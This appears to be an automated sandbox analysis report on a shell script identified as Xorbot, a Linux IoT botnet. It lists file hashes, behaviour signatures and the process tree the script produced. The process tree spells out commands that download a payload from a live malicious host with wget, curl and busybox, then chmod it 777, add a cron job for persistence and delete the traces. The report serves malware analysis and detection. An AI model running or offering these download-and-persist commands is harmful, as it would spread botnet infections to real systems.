Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    28/02/2025, 07:26

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    4cfb0882602e49bb3bb56c54e08029a6

  • SHA1

    d60467677204a5e3045c01dca1ff688264ab69b9

  • SHA256

    199cd72604764bd453856e029830cce18d0f746a1caae617cbafebda9d785617

  • SHA512

    d9a9c852ca4823533dab2b557a096e4055d3665ce8f562b2d0612029ecba77d391811af06e53e55e4fb483589d1009ab948faf0590252578a3f9a143d5c14aef

  • SSDEEP

    192:0BBSrBsKwWxWlWYW/W3WB9GurAMMsG253Xy5bz2R95PvExdDPvExdrV3X0bz2R9L:0BBSrBsKwWxWlWYW/W3WB6sG285bz2RF

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    • Renames itself
    • Reads runtime system information
    PID:1499
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:1501
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1502
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1506
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1508
      • /bin/chmod
        chmod 777 rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
        2⤵
        • File and Directory Permissions Modification
        PID:1509
      • /usr/bin/crontab
        crontab -l
        2⤵
          PID:1513
        • /usr/bin/crontab
          crontab -
          2⤵
          • Creates/modifies Cron job
          PID:1515
        • /bin/rm
          rm rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb
          2⤵
            PID:1517
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/bgbICM0olYJrc6cfTBs9VEebhDkgyLB4ZL
            2⤵
            • System Network Configuration Discovery
            PID:1520

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/rn0P4OAAcwzfKie3L2IEODh4f4NeUGcUwb

          Filesize

          99KB

          MD5

          9438d9bc392bcf300a5583b6df5bc8f6

          SHA1

          375a6ae34b516f6f3eeea8030c4084f585017efa

          SHA256

          68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

          SHA512

          1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

        • /var/spool/cron/crontabs/tmp.Nh9UKQ

          Filesize

          210B

          MD5

          9e46f0d9bbb1d05fa0595ba01101e50d

          SHA1

          5483b61331391ab199530dff2514fdd6b3bec944

          SHA256

          f00fbe556f5009f634279ffe07494cbfb9e1f1decf04a47dfd880f6d2db7f123

          SHA512

          33ce795a80bdfe104d3704d30af47529e3b342aa20a2363db949a1143179d73b506555d0e7b02ac1d3234b83dd471c6b49e90e7cee5cebef1fe49d0e971427af